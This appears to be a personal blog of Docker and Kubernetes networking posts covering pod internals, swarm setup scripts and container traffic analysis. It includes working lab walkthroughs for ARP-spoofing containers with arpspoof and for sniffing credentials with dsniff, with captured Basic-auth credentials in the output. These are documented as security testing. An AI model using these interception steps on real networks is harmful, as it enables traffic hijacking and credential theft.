Saturday, March 4, 2017

#Docker containers versus #K8S pod

I’m writing this short article for all you #docker, #kubernetes and #real_hackers out there, to explain how K8S pods and Docker containers relate.

All my testing has been done on a small K8S cluster that is easily created via Google Container Engine. There are lots of tutorials around to get things started.

Once you have a cluster, you can deploy a simple pod like this by means of kubectl (example from https://kubernetes.io/docs/tasks/kubectl/get-shell-running-container/):

kubectl create -f https://k8s.io/docs/tasks/kubectl/shell-demo.yaml
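For reference, the manifest boils down to something like this (a minimal sketch; the actual shell-demo.yaml may include extras such as a volume mount):

kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: shell-demo
spec:
  containers:
  - name: nginx
    image: nginx
EOF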
 
 
Verify that the pod has started, which IP was assigned, and which node of the cluster we’re using:
kubectl get pods -o wide

Now SSH into the K8S node via the console. You can identify the node from the previous command’s output (remember, kubectl is talking to the K8S master node). Once you have a console on the respective node:
 
docker ps

The output will show quite a lot of containers; identify the ones containing “shell-demo”:
 
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
6aefa4147d06 nginx "nginx -g 'daemon off" About an hour ago Up About an hour
 k8s_nginx.6e1f6ec8_shell-demo_default_e9e26eef-0006-11e7-aded-42010a8001be_8f315325

3cb9ae6edfee gcr.io/google_containers/pause-amd64:3.0 "/pause" About an hour ago Up About an hour
 k8s_POD.d8dbe16c_shell-demo_default_e9e26eef-0006-11e7-aded-42010a8001be_4c955228
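You can narrow the output directly with a name filter:

docker ps --filter name=shell-demo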


When you look carefully, there are 2 containers running: one running ‘pause’ and one running our nginx image (specified in shell-demo.yaml).


The gcr.io/google_containers/pause-amd64:3.0 image is actually a container doing very little, except providing the namespaces (Process, Network, Mount, Hostname, Shared Memory) for the pod.

In K8S, containers that belong together are organized in pods. All containers in a pod share the same network namespace, and therefore the same IP address. So how is this organized?

When a pod is created, the pause container (gcr.io/google_containers/pause-amd64:3.0, 3cb9ae6edfee above) is started first. It acquires an IP address from the K8S overlay network. Once this container is active, our shell-demo app (nginx) container is started in a particular way, probably something similar to:
 
docker run -d --net container:id_of_pause_container --ipc container:id_of_pause_container nginx
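You can verify this on the node: the nginx container’s network mode should point at the pause container. A quick check using Docker’s inspect format (container IDs taken from the docker ps output above):

docker inspect -f '{{.HostConfig.NetworkMode}}' 6aefa4147d06
# should print something like: container:3cb9ae6edfee...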

So could we add a container and link it to the pod? Let’s figure out the IP address of the pod.
 
kubectl get pods -o wide

Now let’s run a tcpdump container that will link to the pod (see https://medium.com/@xxradar/how-to-tcpdump-effectively-in-docker-2ed0a09b5406 to build it and for more options).
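If you haven’t built the tcpdump image yet, a minimal build looks something like this (assuming the local image tag tcpdump; the article above covers more elaborate options):

docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -n -i eth0
EOF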
 
 
docker run -it --net=container:id_of_pause_container tcpdump
 
ex. docker run -it --net=container:3cb9ae6edfee tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
13:25:59.239352 IP 10.128.0.2.49046 > 10.0.0.7.80: Flags [S], seq 3950690280, win 28400, options [mss 1420,sackOK,TS val 9598868 ecr 0,nop,wscale 7], length 0
13:25:59.239393 IP 10.0.0.7.80 > 10.128.0.2.49046: Flags [S.], seq 3158946458, ack 3950690281, win 28160, options [mss 1420,sackOK,TS val 9599163 ecr 9598868,nop,wscale 7], length 0
13:25:59.239947 IP 10.128.0.2.49046 > 10.0.0.7.80: Flags [.], ack 1, win 222, options [nop,nop,TS val 9598869 ecr 9599163], length 0
13:25:59.239977 IP 10.128.0.2.49046 > 10.0.0.7.80: Flags ...

Some other tricks
 
ex. docker run -it --net=container:3cb9ae6edfee busybox ifconfig
eth0      Link encap:Ethernet  HWaddr 0A:58:0A:00:00:07 
inet addr:10.0.0.7  Bcast:0.0.0.0  Mask:255.255.255.0 
inet6 addr: fe80::cd7:6ff:fe31:6442/64 Scope:Link ...
 
 
ex. docker run -it --net=container:3cb9ae6edfee busybox netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*    
  
I think it is even possible to share the process namespace:
 
docker run -it --net=container:3cb9ae6edfee --pid=host busybox ps

The previous example shares the process namespace of the entire host and seems to work, but the next example fails, I think due to a bug in Docker v1.11. It should be solved in a later version of Docker.
 
docker run -it --net=container:3cb9ae6edfee --pid=container:3cb9ae6edfee busybox

So … learn Docker the hard way!! K8S is a very cool solution, as is SWARM in my opinion, but it uses, among other things, containers in a ‘special’ way. To my understanding, K8S adds a lot of features and does things differently, but when you boil it down to the container level you will understand the magic!

Thursday, January 26, 2017

ARP spoofing Docker containers


ARP spoofing is a relatively old hacking technique to intercept traffic on switched/bridged networks. It is essentially a mechanism to poison the ARP cache used by systems to find the MAC address of a certain host. Google searches will yield lots of information about the topic if you need further reading.

This write-up simply validates whether the technique still works in containerized environments.

So let’s create a test environment to prove the point.

docker-machine create \
--driver digitalocean \
--digitalocean-access-token=d68aa…65b14e \
spooftest

Open a few terminals to make the testing easy

docker-machine ssh spooftest

On terminal 1, create the required containers
# docker build -t arpspoof - <<EOF
FROM debian
RUN apt-get update && apt-get install -y dsniff
EOF

# docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -n -i eth0
EOF

On terminal 2, create a busybox container named box1
# docker run -it --name box1 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04
          inet addr:172.17.0.4  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:508 (508.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ #

On terminal 3, create a busybox container named box2
# docker run -it --name box2 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:05
          inet addr:172.17.0.5  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:418 (418.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # ping 172.17.0.4

On terminal 1, launch the arpspoof attack
# docker run -it --name arpspoofer arpspoof
arpspoof -i eth0  -t 172.17.0.5 172.17.0.4 &
arpspoof -i eth0  -t 172.17.0.4 172.17.0.5 &
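For the traffic to actually be relayed rather than dropped, IP forwarding must be enabled inside the attacking container (note: writing to /proc/sys typically requires starting the container with --privileged):

echo 1 > /proc/sys/net/ipv4/ip_forward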

On terminal 4, launch a tcpdump to verify the arpspoof taking place
docker run -it --name tcpdumper --net=container:arpspoofer tcpdump

Traffic should be relayed through the arpspoof container!
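You can double-check the poisoning from box2 by reading its ARP cache via /proc (which works regardless of which applets your busybox image ships); the MAC listed for 172.17.0.4 should change to the attacker’s address while arpspoof is running:

/ # cat /proc/net/arp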

Monday, January 16, 2017

Networking update on DOCKER 1.13.0-rc6 (beta)

As pointed out in my previous blog post, it was not possible to connect containers to a SWARM OVERLAY network used by a service.

Docker v1.13 introduces the --attachable flag for network creation.

You can now create networks as follows:
docker network create --attachable --driver overlay net-1

Creating a service did not change, so:
docker service create  --name nginx --network net-1 --replicas 3  -p 80:80  nginx
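Before testing, you can verify that the tasks are up:

docker service ps nginx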

Instead of running your test containers as a service or using other fancy tricks, we can now simply test by:
docker run -it --rm --network net-1 xxradar/hackon ping nginx

Happy testing !



Tuesday, September 20, 2016

Update Getting started with Docker Version 1.12.1

A few things changed since the previous post, certainly the way you deploy Docker swarm mode, as well as a few things on the networking side.


I therefore share this example script to quickly get started with a new setup and play around.

#!/bin/bash
docker-machine ls




#create 1st manager node


docker-machine create -d virtualbox manager1
eval $(docker-machine env manager1)
docker swarm init --advertise-addr $(docker-machine ip manager1)
docker swarm join-token -q manager > manager-token.txt
docker swarm join-token -q worker > worker-token.txt
 

#create 2nd and 3rd manager nodes


for N in 2 3; do
  docker-machine create -d virtualbox manager$N
  eval $(docker-machine env manager$N)
  docker swarm join --token $(cat manager-token.txt) $(docker-machine ip manager1)
done

#create worker nodes 1 to 4

for N in `seq 1 4`; do
  docker-machine create -d virtualbox worker$N
  eval $(docker-machine env worker$N)
  docker swarm join --token $(cat worker-token.txt) $(docker-machine ip manager1)
done

eval $(docker-machine env manager1)
docker service create --name nginx -p 80:80 --replicas 20 nginx
docker service create --name nginx2 --constraint node.role==worker \
  -p 8080:80 \
  --replicas 5 nginx
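Once the script completes, a quick sanity check (standard swarm commands):

eval $(docker-machine env manager1)
docker node ls
docker service ls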


Please note that it is no longer possible to connect "non"-service containers to the overlay networks, as indicated in the previous post.

A trick to test the overlay network is to spin up a service in which you install your debugging tools, or to link a container to a service container, for example:


docker run -it --net=container:id_of_a_service_container xxradar/hackon


Tuesday, June 21, 2016

Getting started with Docker RC 1.12

Docker RC 1.12 is available and introduces some new features that will make things easier ... but sometimes need some explanation :-)

This set of commands will create a SWARM setup that is (according to the documentation) fully secured, using virtualbox.
 
To create the VMs
docker-machine create -d virtualbox test112
docker-machine create -d virtualbox test112n1
docker-machine create -d virtualbox test112n2

Starting the VMs
docker-machine start test112
docker-machine start test112n1
docker-machine start test112n2


Setting up Swarm on the master node
eval $(docker-machine env test112)
docker swarm init --listen-addr $(docker-machine ip test112):2377


Setting up Swarm on worker node1 (note: workers join the master, they do not init)
eval $(docker-machine env test112n1)
docker swarm join $(docker-machine ip test112):2377


Setting up Swarm on worker node2
eval $(docker-machine env test112n2)
docker swarm join $(docker-machine ip test112):2377
You can verify your setup
eval $(docker-machine env test112)
docker node ls


mymachine$ docker node ls
ID                           NAME       MEMBERSHIP  STATUS  AVAILABILITY  MANAGER STATUS
5bvk0htdkyv9ksddzsy3wgnn6    test112n2  Accepted    Ready   Active       
6dq3g4jtiak27pd56mpk06stx    test112n1  Accepted    Ready   Active       
e234397csi7wlt5dbj2ksu9qp *  test112    Accepted    Ready   Active        Leader





You can now create an overlay network
docker network create --driver=overlay my-net


And now you start the service ...
docker service create --replicas 1 --network  my-net --name nginx nginx
 
... and now you can scale !
docker service scale nginx=5

If you plan to try out the new load-balancing feature, use the -p flag:
docker service create --replicas 5 --network my-net --name nginx2 -p 8888:80 nginx
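You can then hit any node on the published port to see the built-in load balancing (assuming curl is available on your machine):

curl http://$(docker-machine ip test112):8888
curl http://$(docker-machine ip test112n1):8888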


Note that in this case your services will be automatically distributed over all 3 nodes. On every node, port 8888 will be mapped to all the tasks (of the service, to use the lingo :-)). (By default on Mac this is 192.168.99.100, 192.168.99.101, etc.)
 
Because we use an overlay network, requests that are sent to node1 on 192.168.99.100:8888, for example, can also be distributed via the container overlay to all other nodes. You can check this by using docker logs containerid.

Another thing I noticed is that you cannot connect a container to a swarm scoped overlay directly.

So this will NOT work: docker run -it --net=my-net xxradar/hackon

You can, however, run docker run -it xxradar/hackon and then link the container to the network with docker network connect my-net containerid


Have fun exploring !!

 
 

Monday, June 13, 2016

Analyzing container network traffic ... using other containers !


Containers can use the network stack in a few different ways:

- none
- docker bridge (or user defined networks and overlays)
- host (shares the network stack of the docker host)
- container networks (ex. docker run --net container:id ...)

Building a container to run good old tools like tcpdump or ngrep, or for the old-school hackers, dsniff, urlsnarf, etc. would not yield much interesting information, because by default the container is linked to the default bridge network.

On the other hand, you can link your container to the host network with --net=host, or even to another container with --net=container:id. In these cases you can basically sniff the traffic of the entire host, or of a specific container !


To build a container that runs dsniff is pretty simple. Take this Dockerfile:


FROM debian
RUN apt-get update && apt-get install -y dsniff
CMD dsniff -i eth0 -m


and build it like
docker build -t xxradar/dsniffcon .

You can now link the container to --net=host
docker run -it --net=host xxradar/dsniffcon 

root@host:~/dsniffcon# docker run -it --net=host xxradar/dsniffcon
dsniff: listening on eth0
-----------------
06/13/16 19:58:40 tcp 12.97.16.194.9143 -> www.foo.com.80 (http)
GET / HTTP/1.1
Host:
www.foo.com
Authorization: Basic dGVzdDp0ZXN0cHc= [test:testpw] 


or to specific container (ex. a nginx container)

root@host::~/dsniffcon# docker run -it --net=container:a51ba... xxradar/dsniffcon
dsniff: listening on eth0
-----------------
06/13/16 20:00:56 tcp 12.97.16.194.5288 -> a51414ba0ff9.80 (http)
GET / HTTP/1.1
Host: www.foo.com
Authorization: Basic dGVzdDp0ZXN0cHc= [test:testpw]


 
 



 

Monday, June 6, 2016

Decoding TLS DOCKER API with WireShark @Dockersec

Open Wireshark
  --> preferences
   --> protocols
     --> ssl


Edit RSA keys list
  --> IP address: the IP address of your Docker API or Docker Swarm API host
  --> Port: typically 2376, or 3376 for Swarm
  --> Protocol: http
  --> Key File: /Users/username/.docker/machine/machines/docker-host/server-key.pem
      (you might need to copy the key to an accessible location)


Start Wireshark
Capture on vboxnet5 if you are using Virtualbox

Run a docker command !!
ex. docker ps
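Any client command generates traffic to decrypt. For example, assuming your machine is named docker-host to match the key path above:

eval $(docker-machine env docker-host)
docker ps

Note that decrypting with the server's private key only works for RSA key-exchange cipher suites; connections negotiated with (EC)DHE provide forward secrecy and cannot be decrypted this way.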